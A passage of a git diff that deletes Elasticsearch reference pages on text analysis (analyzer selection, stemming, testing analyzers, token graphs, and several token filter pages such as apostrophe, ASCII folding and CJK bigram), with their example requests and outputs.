<> mapping parameter for the field. - See <>. -. The `analysis.analyzer.default` index setting. - See <>. - -If none of these parameters are specified, the -<> is used. - -[[specify-index-field-analyzer]] -==== Specify the analyzer for a field - -When mapping an index, you can use the <> mapping parameter -to specify an analyzer for each `text` field. - -The following <> request sets the -`whitespace` analyzer as the analyzer for the `title` field. - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "whitespace" - } - } - } -} ----- - -[[specify-index-time-default-analyzer]] -==== Specify the default analyzer for an index - -In addition to a field-level analyzer, you can set a fallback analyzer for -using the `analysis.analyzer.default` setting. - -The following <> request sets the -`simple` analyzer as the fallback analyzer for `my-index-000001`. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "type": "simple" - } - } - } - } -} ----- - -[[specify-search-analyzer]] -==== How {es} determines the search analyzer - -// tag::search-analyzer-warning[] -[WARNING] -==== -In most cases, specifying a different search analyzer is unnecessary. Doing so -could negatively impact relevancy and result in unexpected search results. - -If you choose to specify a separate search analyzer, we recommend you thoroughly -<> before deploying in -production. -==== -// end::search-analyzer-warning[] - -At search time, {es} determines which analyzer to use by checking the following -parameters in order: - -. The <> parameter in the search query. - See <>. -. The <> mapping parameter for the field. - See <>. -. The `analysis.analyzer.default_search` index setting. - See <>. -. The <> mapping parameter for the field. - See <>. - -If none of these parameters are specified, the -<> is used. - -[[specify-search-query-analyzer]] -==== Specify the search analyzer for a query - -When writing a <>, you can use the `analyzer` -parameter to specify a search analyzer. If provided, this overrides any other -search analyzers. - -The following <> request sets the `stop` analyzer as -the search analyzer for a <> query. - -[source,console] ----- -GET my-index-000001/_search -{ - "query": { - "match": { - "message": { - "query": "Quick foxes", - "analyzer": "stop" - } - } - } -} ----- -// TEST[s/^/PUT my-index-000001\n/] - -[[specify-search-field-analyzer]] -==== Specify the search analyzer for a field - -When mapping an index, you can use the <> mapping -parameter to specify a search analyzer for each `text` field. - -If a search analyzer is provided, the index analyzer must also be specified -using the `analyzer` parameter. - -The following <> request sets the -`simple` analyzer as the search analyzer for the `title` field. - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "whitespace", - "search_analyzer": "simple" - } - } - } -} ----- - -[[specify-search-default-analyzer]] -==== Specify the default search analyzer for an index - -When <>, you can set a default search -analyzer using the `analysis.analyzer.default_search` setting. - -If a search analyzer is provided, a default index analyzer must also be -specified using the `analysis.analyzer.default` setting. - -The following <> request sets the -`whitespace` analyzer as the default search analyzer for the `my-index-000001` index. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "type": "simple" - }, - "default_search": { - "type": "whitespace" - } - } - } - } -} ----- diff --git a/docs/reference/analysis/stemming.asciidoc b/docs/reference/analysis/stemming.asciidoc deleted file mode 100644 index c590152d2df..00000000000 --- a/docs/reference/analysis/stemming.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[stemming]] -=== Stemming - -_Stemming_ is the process of reducing a word to its root form. This ensures -variants of a word match during a search. - -For example, `walking` and `walked` can be stemmed to the same root word: -`walk`. Once stemmed, an occurrence of either word would match the other in a -search. - -Stemming is language-dependent but often involves removing prefixes and -suffixes from words. - -In some cases, the root form of a stemmed word may not be a real word. For -example, `jumping` and `jumpiness` can both be stemmed to `jumpi`. While `jumpi` -isn't a real English word, it doesn't matter for search; if all variants of a -word are reduced to the same root form, they will match correctly. - -[[stemmer-token-filters]] -==== Stemmer token filters - -In {es}, stemming is handled by stemmer <>. These token filters can be categorized based on how they stem words: - -* <>, which stem words based on a set -of rules -* <>, which stem words by looking them -up in a dictionary - -Because stemming changes tokens, we recommend using the same stemmer token -filters during <>. - -[[algorithmic-stemmers]] -==== Algorithmic stemmers - -Algorithmic stemmers apply a series of rules to each word to reduce it to its -root form. For example, an algorithmic stemmer for English may remove the `-s` -and `-es` prefixes from the end of plural words. - -Algorithmic stemmers have a few advantages: - -* They require little setup and usually work well out of the box. -* They use little memory. -* They are typically faster than <>. - -However, most algorithmic stemmers only alter the existing text of a word. This -means they may not work well with irregular words that don't contain their root -form, such as: - -* `be`, `are`, and `am` -* `mouse` and `mice` -* `foot` and `feet` - -The following token filters use algorithmic stemming: - -* <>, which provides algorithmic -stemming for several languages, some with additional variants. -* <>, a stemmer for English that combines -algorithmic stemming with a built-in dictionary. -* <>, our recommended algorithmic -stemmer for English. -* <>, which uses -https://snowballstem.org/[Snowball]-based stemming rules for several -languages. - -[[dictionary-stemmers]] -==== Dictionary stemmers - -Dictionary stemmers look up words in a provided dictionary, replacing unstemmed -word variants with stemmed words from the dictionary. - -In theory, dictionary stemmers are well suited for: - -* Stemming irregular words -* Discerning between words that are spelled similarly but not related -conceptually, such as: -** `organ` and `organization` -** `broker` and `broken` - -In practice, algorithmic stemmers typically outperform dictionary stemmers. This -is because dictionary stemmers have the following disadvantages: - -* *Dictionary quality* + -A dictionary stemmer is only as good as its dictionary. To work well, these -dictionaries must include a significant number of words, be updated regularly, -and change with language trends. Often, by the time a dictionary has been made -available, it's incomplete and some of its entries are already outdated. - -* *Size and performance* + -Dictionary stemmers must load all words, prefixes, and suffixes from its -dictionary into memory. This can use a significant amount of RAM. Low-quality -dictionaries may also be less efficient with prefix and suffix removal, which -can slow the stemming process significantly. - -You can use the <> token filter to -perform dictionary stemming. - -[TIP] -==== -If available, we recommend trying an algorithmic stemmer for your language -before using the <> token filter. -==== - -[[control-stemming]] -==== Control stemming - -Sometimes stemming can produce shared root words that are spelled similarly but -not related conceptually. For example, a stemmer may reduce both `skies` and -`skiing` to the same root word: `ski`. - -To prevent this and better control stemming, you can use the following token -filters: - -* <>, which lets you -define rules for stemming specific tokens. -* <>, which marks -specified tokens as keywords. Keyword tokens are not stemmed by subsequent -stemmer token filters. -* <>, which can be used to mark -tokens as keywords, similar to the `keyword_marker` filter. - - -For built-in <>, you also can use the -<<_excluding_words_from_stemming,`stem_exclusion`>> parameter to specify a list -of words that won't be stemmed. diff --git a/docs/reference/analysis/testing.asciidoc b/docs/reference/analysis/testing.asciidoc deleted file mode 100644 index a430fb18a05..00000000000 --- a/docs/reference/analysis/testing.asciidoc +++ /dev/null @@ -1,207 +0,0 @@ -[[test-analyzer]] -=== Test an analyzer - -The <> is an invaluable tool for viewing the -terms produced by an analyzer. A built-in analyzer can be specified inline in -the request: - -[source,console] -------------------------------------- -POST _analyze -{ - "analyzer": "whitespace", - "text": "The quick brown fox." -} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 4, - "end_offset": 9, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 10, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox.", - "start_offset": 16, - "end_offset": 20, - "type": "word", - "position": 3 - } - ] -} -------------------------------------- - -You can also test combinations of: - -* A tokenizer -* Zero or more token filters -* Zero or more character filters - -[source,console] -------------------------------------- -POST _analyze -{ - "tokenizer": "standard", - "filter": [ "lowercase", "asciifolding" ], - "text": "Is this déja vu?" -} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 8, - "end_offset": 12, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 13, - "end_offset": 15, - "type": "", - "position": 3 - } - ] -} -------------------------------------- - -.Positions and character offsets -********************************************************* - -As can be seen from the output of the `analyze` API, analyzers not only -convert words into terms, they also record the order or relative _positions_ -of each term (used for phrase queries or word proximity queries), and the -start and end _character offsets_ of each term in the original text (used for -highlighting search snippets). - -********************************************************* - - -Alternatively, a <> can be -referred to when running the `analyze` API on a specific index: - -[source,console] -------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "std_folded": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "asciifolding" - ] - } - } - } - }, - "mappings": { - "properties": { - "my_text": { - "type": "text", - "analyzer": "std_folded" <2> - } - } - } -} - -GET my-index-000001/_analyze <3> -{ - "analyzer": "std_folded", <4> - "text": "Is this déjà vu?" -} - -GET my-index-000001/_analyze <3> -{ - "field": "my_text", <5> - "text": "Is this déjà vu?" -} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 8, - "end_offset": 12, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 13, - "end_offset": 15, - "type": "", - "position": 3 - } - ] -} -------------------------------------- - -<1> Define a `custom` analyzer called `std_folded`. -<2> The field `my_text` uses the `std_folded` analyzer. -<3> To refer to this analyzer, the `analyze` API must specify the index name. -<4> Refer to the analyzer by name. -<5> Refer to the analyzer used by field `my_text`. diff --git a/docs/reference/analysis/token-graphs.asciidoc b/docs/reference/analysis/token-graphs.asciidoc deleted file mode 100644 index 20f91891aed..00000000000 --- a/docs/reference/analysis/token-graphs.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[token-graphs]] -=== Token graphs - -When a <> converts a text into a stream of -tokens, it also records the following: - -* The `position` of each token in the stream -* The `positionLength`, the number of positions that a token spans - -Using these, you can create a -{wikipedia}/Directed_acyclic_graph[directed acyclic graph], -called a _token graph_, for a stream. In a token graph, each position represents -a node. Each token represents an edge or arc, pointing to the next position. - -image::images/analysis/token-graph-qbf-ex.svg[align="center"] - -[[token-graphs-synonyms]] -==== Synonyms - -Some <> can add new tokens, like -synonyms, to an existing token stream. These synonyms often span the same -positions as existing tokens. - -In the following graph, `quick` and its synonym `fast` both have a position of -`0`. They span the same positions. - -image::images/analysis/token-graph-qbf-synonym-ex.svg[align="center"] - -[[token-graphs-multi-position-tokens]] -==== Multi-position tokens - -Some token filters can add tokens that span multiple positions. These can -include tokens for multi-word synonyms, such as using "atm" as a synonym for -"automatic teller machine." - -However, only some token filters, known as _graph token filters_, accurately -record the `positionLength` for multi-position tokens. This filters include: - -* <> -* <> - -In the following graph, `domain name system` and its synonym, `dns`, both have a -position of `0`. However, `dns` has a `positionLength` of `3`. Other tokens in -the graph have a default `positionLength` of `1`. - -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -[[token-graphs-token-graphs-search]] -===== Using token graphs for search - -<> ignores the `positionLength` attribute -and does not support token graphs containing multi-position tokens. - -However, queries, such as the <> or -<> query, can use these graphs to -generate multiple sub-queries from a single query string. - -.*Example* -[%collapsible] -==== - -A user runs a search for the following phrase using the `match_phrase` query: - -`domain name system is fragile` - -During <>, `dns`, a synonym for -`domain name system`, is added to the query string's token stream. The `dns` -token has a `positionLength` of `3`. - -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -The `match_phrase` query uses this graph to generate sub-queries for the -following phrases: - -[source,text] ------- -dns is fragile -domain name system is fragile ------- - -This means the query matches documents containing either `dns is fragile` _or_ -`domain name system is fragile`. -==== - -[[token-graphs-invalid-token-graphs]] -===== Invalid token graphs - -The following token filters can add tokens that span multiple positions but -only record a default `positionLength` of `1`: - -* <> -* <> - -This means these filters will produce invalid token graphs for streams -containing such tokens. - -In the following graph, `dns` is a multi-position synonym for `domain name -system`. However, `dns` has the default `positionLength` value of `1`, resulting -in an invalid graph. - -image::images/analysis/token-graph-dns-invalid-ex.svg[align="center"] - -Avoid using invalid token graphs for search. Invalid graphs can cause unexpected -search results. \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters.asciidoc b/docs/reference/analysis/tokenfilters.asciidoc deleted file mode 100644 index 46cd0347b72..00000000000 --- a/docs/reference/analysis/tokenfilters.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analysis-tokenfilters]] -== Token filter reference - -Token filters accept a stream of tokens from a -<> and can modify tokens -(eg lowercasing), delete tokens (eg remove stopwords) -or add tokens (eg synonyms). - -{es} has a number of built-in token filters you can use -to build <>. - - -include::tokenfilters/apostrophe-tokenfilter.asciidoc[] - -include::tokenfilters/asciifolding-tokenfilter.asciidoc[] - -include::tokenfilters/cjk-bigram-tokenfilter.asciidoc[] - -include::tokenfilters/cjk-width-tokenfilter.asciidoc[] - -include::tokenfilters/classic-tokenfilter.asciidoc[] - -include::tokenfilters/common-grams-tokenfilter.asciidoc[] - -include::tokenfilters/condition-tokenfilter.asciidoc[] - -include::tokenfilters/decimal-digit-tokenfilter.asciidoc[] - -include::tokenfilters/delimited-payload-tokenfilter.asciidoc[] - -include::tokenfilters/dictionary-decompounder-tokenfilter.asciidoc[] - -include::tokenfilters/edgengram-tokenfilter.asciidoc[] - -include::tokenfilters/elision-tokenfilter.asciidoc[] - -include::tokenfilters/fingerprint-tokenfilter.asciidoc[] - -include::tokenfilters/flatten-graph-tokenfilter.asciidoc[] - -include::tokenfilters/hunspell-tokenfilter.asciidoc[] - -include::tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc[] - -include::tokenfilters/keep-types-tokenfilter.asciidoc[] - -include::tokenfilters/keep-words-tokenfilter.asciidoc[] - -include::tokenfilters/keyword-marker-tokenfilter.asciidoc[] - -include::tokenfilters/keyword-repeat-tokenfilter.asciidoc[] - -include::tokenfilters/kstem-tokenfilter.asciidoc[] - -include::tokenfilters/length-tokenfilter.asciidoc[] - -include::tokenfilters/limit-token-count-tokenfilter.asciidoc[] - -include::tokenfilters/lowercase-tokenfilter.asciidoc[] - -include::tokenfilters/minhash-tokenfilter.asciidoc[] - -include::tokenfilters/multiplexer-tokenfilter.asciidoc[] - -include::tokenfilters/ngram-tokenfilter.asciidoc[] - -include::tokenfilters/normalization-tokenfilter.asciidoc[] - -include::tokenfilters/pattern-capture-tokenfilter.asciidoc[] - -include::tokenfilters/pattern_replace-tokenfilter.asciidoc[] - -include::tokenfilters/phonetic-tokenfilter.asciidoc[] - -include::tokenfilters/porterstem-tokenfilter.asciidoc[] - -include::tokenfilters/predicate-tokenfilter.asciidoc[] - -include::tokenfilters/remove-duplicates-tokenfilter.asciidoc[] - -include::tokenfilters/reverse-tokenfilter.asciidoc[] - -include::tokenfilters/shingle-tokenfilter.asciidoc[] - -include::tokenfilters/snowball-tokenfilter.asciidoc[] - -include::tokenfilters/stemmer-tokenfilter.asciidoc[] - -include::tokenfilters/stemmer-override-tokenfilter.asciidoc[] - -include::tokenfilters/stop-tokenfilter.asciidoc[] - -include::tokenfilters/synonym-tokenfilter.asciidoc[] - -include::tokenfilters/synonym-graph-tokenfilter.asciidoc[] - -include::tokenfilters/trim-tokenfilter.asciidoc[] - -include::tokenfilters/truncate-tokenfilter.asciidoc[] - -include::tokenfilters/unique-tokenfilter.asciidoc[] - -include::tokenfilters/uppercase-tokenfilter.asciidoc[] - -include::tokenfilters/word-delimiter-tokenfilter.asciidoc[] - -include::tokenfilters/word-delimiter-graph-tokenfilter.asciidoc[] diff --git a/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc b/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc deleted file mode 100644 index c2558d0b91b..00000000000 --- a/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -//// -This is a template for token filter reference documentation. - -To document a new token filter, copy this file, remove comments like this, and -replace "sample" with the appropriate filter name. - -Ensure the new filter docs are linked and included in -docs/reference/analysis/tokefilters.asciidoc -//// - -[[sample-tokenfilter]] -=== Sample token filter -++++ -Sample -++++ - -//// -INTRO -Include a brief, 1-2 sentence description. -If based on a Lucene token filter, link to the Lucene documentation. -//// - -Does a cool thing. For example, the `sample` filter changes `x` to `y`. - -The filter uses Lucene's -{lucene-analysis-docs}/sampleFilter.html[SampleFilter]. - -[[analysis-sample-tokenfilter-analyze-ex]] -==== Example -//// -Basic example of the filter's input and output token streams. - -Guidelines -*************************************** -* The _analyze API response should be included but commented out. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -The following <> request uses the `sample` -filter to do a cool thing to `the quick fox jumps the lazy dog`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["sample"], - "text" : "the quick fox jumps the lazy dog" -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - -The filter produces the following tokens: - -[source,text] ----- -[ the, quick, fox, jumps, the, lazy, dog ] ----- - -//// -[source,console-result] ----- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "over", - "start_offset" : 20, - "end_offset" : 24, - "type" : "", - "position" : 4 - }, - { - "token" : "the", - "start_offset" : 25, - "end_offset" : 28, - "type" : "", - "position" : 5 - }, - { - "token" : "lazy", - "start_offset" : 29, - "end_offset" : 33, - "type" : "", - "position" : 6 - }, - { - "token" : "dog", - "start_offset" : 34, - "end_offset" : 37, - "type" : "", - "position" : 7 - } - ] -} ----- -// TEST[skip: REMOVE THIS COMMENT.] -//// - -[[analysis-sample-tokenfilter-analyzer-ex]] -==== Add to an analyzer -//// -Example of how to add a pre-configured token filter to an analyzer. -If the filter requires arguments, skip this section. - -Guidelines -*************************************** -* If needed, change the tokenizer so the example fits the filter. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -The following <> request uses the -`sample` filter to configure a new <>. - -[source,console] ----- -PUT sample_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_sample_analyzer": { - "tokenizer": "standard", - "filter": [ "sample" ] - } - } - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - - -[[analysis-sample-tokenfilter-configure-parms]] -==== Configurable parameters -//// -Documents each parameter for the token filter. -If the filter does not have any configurable parameters, skip this section. - -Guidelines -*************************************** -* Use a definition list. -* End each definition with a period. -* Include whether the parameter is Optional or Required and the data type. -* Include default values as the last sentence of the first paragraph. -* Include a range of valid values, if applicable. -* If the parameter requires a specific delimiter for multiple values, say so. -* If the parameter supports wildcards, ditto. -* For large or nested objects, consider linking to a separate definition list. -*************************************** -//// - -`foo`:: -(Optional, Boolean) -If `true`, do a cool thing. -Defaults to `false`. - -`baz`:: -(Optional, string) -Path to another cool thing. - -[[analysis-sample-tokenfilter-customize]] -==== Customize -//// -Example of a custom token filter with configurable parameters. -If the filter does not have any configurable parameters, skip this section. - -Guidelines -*************************************** -* If able, use a different tokenizer than used in "Add to an analyzer." -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -To customize the `sample` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `sample` filter with -`foo` set to `true`: - -[source,console] ----- -PUT sample_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "whitespace", - "filter": [ "my_custom_sample_token_filter" ] - } - }, - "filter": { - "my_custom_sample_token_filter": { - "type": "sample", - "foo": true - } - } - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] diff --git a/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc deleted file mode 100644 index 49c75e47af0..00000000000 --- a/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[[analysis-apostrophe-tokenfilter]] -=== Apostrophe token filter -++++ -Apostrophe -++++ - -Strips all characters after an apostrophe, including the apostrophe itself. - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/tr/ApostropheFilter.html[ApostropheFilter], which was -built for the Turkish language. - - -[[analysis-apostrophe-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -apostrophe token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["apostrophe"], - "text" : "Istanbul'a veya Istanbul'dan" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Istanbul, veya, Istanbul ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Istanbul", - "start_offset" : 0, - "end_offset" : 10, - "type" : "", - "position" : 0 - }, - { - "token" : "veya", - "start_offset" : 11, - "end_offset" : 15, - "type" : "", - "position" : 1 - }, - { - "token" : "Istanbul", - "start_offset" : 16, - "end_offset" : 28, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-apostrophe-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -apostrophe token filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /apostrophe_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_apostrophe": { - "tokenizer": "standard", - "filter": [ "apostrophe" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc deleted file mode 100644 index 6b836f26dad..00000000000 --- a/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[analysis-asciifolding-tokenfilter]] -=== ASCII folding token filter -++++ -ASCII folding -++++ - -Converts alphabetic, numeric, and symbolic characters that are not in the Basic -Latin Unicode block (first 127 ASCII characters) to their ASCII equivalent, if -one exists. For example, the filter changes `à` to `a`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/ASCIIFoldingFilter.html[ASCIIFoldingFilter]. - -[[analysis-asciifolding-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `asciifolding` -filter to drop the diacritical marks in `açaí à la carte`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["asciifolding"], - "text" : "açaí à la carte" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ acai, a, la, carte ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "acai", - "start_offset" : 0, - "end_offset" : 4, - "type" : "", - "position" : 0 - }, - { - "token" : "a", - "start_offset" : 5, - "end_offset" : 6, - "type" : "", - "position" : 1 - }, - { - "token" : "la", - "start_offset" : 7, - "end_offset" : 9, - "type" : "", - "position" : 2 - }, - { - "token" : "carte", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-asciifolding-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`asciifolding` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /asciifold_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_asciifolding": { - "tokenizer": "standard", - "filter": [ "asciifolding" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-asciifolding-tokenfilter-configure-parms]] -==== Configurable parameters - -`preserve_original`:: -(Optional, Boolean) -If `true`, emit both original tokens and folded tokens. -Defaults to `false`. - -[[analysis-asciifolding-tokenfilter-customize]] -==== Customize - -To customize the `asciifolding` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `asciifolding` filter with -`preserve_original` set to true: - -[source,console] --------------------------------------------------- -PUT /asciifold_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_asciifolding": { - "tokenizer": "standard", - "filter": [ "my_ascii_folding" ] - } - }, - "filter": { - "my_ascii_folding": { - "type": "asciifolding", - "preserve_original": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc deleted file mode 100644 index 4fd7164e82d..00000000000 --- a/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc +++ /dev/null @@ -1,201 +0,0 @@ -[[analysis-cjk-bigram-tokenfilter]] -=== CJK bigram token filter -++++ -CJK bigram -++++ - -Forms {wikipedia}/Bigram[bigrams] out of CJK (Chinese, -Japanese, and Korean) tokens. - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/cjk/CJKBigramFilter.html[CJKBigramFilter]. - - -[[analysis-cjk-bigram-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -CJK bigram token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["cjk_bigram"], - "text" : "東京都は、日本の首都であり" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 東京, 京都, 都は, 日本, 本の, の首, 首都, 都で, であ, あり ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "東京", - "start_offset" : 0, - "end_offset" : 2, - "type" : "", - "position" : 0 - }, - { - "token" : "京都", - "start_offset" : 1, - "end_offset" : 3, - "type" : "", - "position" : 1 - }, - { - "token" : "都は", - "start_offset" : 2, - "end_offset" : 4, - "type" : "", - "position" : 2 - }, - { - "token" : "日本", - "start_offset" : 5, - "end_offset" : 7, - "type" : "", - "position" : 3 - }, - { - "token" : "本の", - "start_offset" : 6, - "end_offset" : 8, - "type" : "", - "position" : 4 - }, - { - "token" : "の首", - "start_offset" : 7, - "end_offset" : 9, - "type" : "", - "position" : 5 - }, - { - "token" : "首都", - "start_offset" : 8, - "end_offset" : 10, - "type" : "", - "position" : 6 - }, - { - "token" : "都で", - "start_offset" : 9, - "end_offset" : 11, - "type" : "", - "position" : 7 - }, - { - "token" : "であ", - "start_offset" : 10, - "end_offset" : 12, - "type" : "", - "position" : 8 - }, - { - "token" : "あり", - "start_offset" : 11, - "end_offset" : 13, - "type" : "", - "position" : 9 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-cjk-bigram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -CJK bigram token filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /cjk_bigram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_cjk_bigram": { - "tokenizer": "standard", - "filter": [ "cjk_bigram" ] - } - } - } - } -} --------------------------------------------------- - - -[[analysis-cjk-bigram-tokenfilter-configure-parms]] -==== Configurable parameters - -`ignored_scripts`:: -+ --- -(Optional, array of character scripts) -Array of character scripts for which to disable bigrams. -Possible values: - -* `han` -* `hangul` -* `hiragana` -* `katakana` - -All non-CJK input is passed through unmodified. --- - -`output_unigrams` -(Optional, Boolean) -If `true`, emit tokens in both bigram and -{wikipedia}/N-gram[unigram] form. If `false`, a CJK character -is output in unigram form when it has no adjacent characters. Defaults to -`false`. - -[[analysis-cjk-bigram-tokenfilter-customize]] -==== Customize - -To customize the CJK bigram token filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -[source,console] --------------------------------------------------- -PUT /cjk_bigram_example -{ - "settings": { - "analysis": { - "analyzer": { - "han_bigrams": { - "tokenizer": "standard", - "filter": [ "han_bigrams_filter" ] - } - }, - "filter": { - "han_bigrams_filter": { - "type": "cjk_bigram", - "ignored_scripts": [ - "hangul", - "hiragana", - "katakana" - ], - "output_unigrams": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc deleted file mode 100644 index e055d1783d4..00000000000 --- a/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[analysis-cjk-width-tokenfilter]] -=== CJK width token filter -++++ -CJK width -++++ - -Normalizes width differences in CJK (Chinese, Japanese, and Korean) characters -as follows: - -* Folds full-width ASCII character variants into the equivalent basic Latin -characters -* Folds half-width Katakana character variants into the equivalent Kana -characters - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/cjk/CJKWidthFilter.html[CJKWidthFilter]. - -NOTE: This token filter can be viewed as a subset of NFKC/NFKD Unicode -normalization. See the -{plugins}/analysis-icu-normalization-charfilter.html[`analysis-icu` plugin] for -full normalization support. - -[[analysis-cjk-width-tokenfilter-analyze-ex]] -==== Example - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["cjk_width"], - "text" : "シーサイドライナー" -} --------------------------------------------------- - -The filter produces the following token: - -[source,text] --------------------------------------------------- -シーサイドライナー --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "シーサイドライナー", - "start_offset" : 0, - "end_offset" : 10, - "type" : "", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-cjk-width-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -CJK width token filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /cjk_width_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_cjk_width": { - "tokenizer": "standard", - "filter": [ "cjk_width" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc 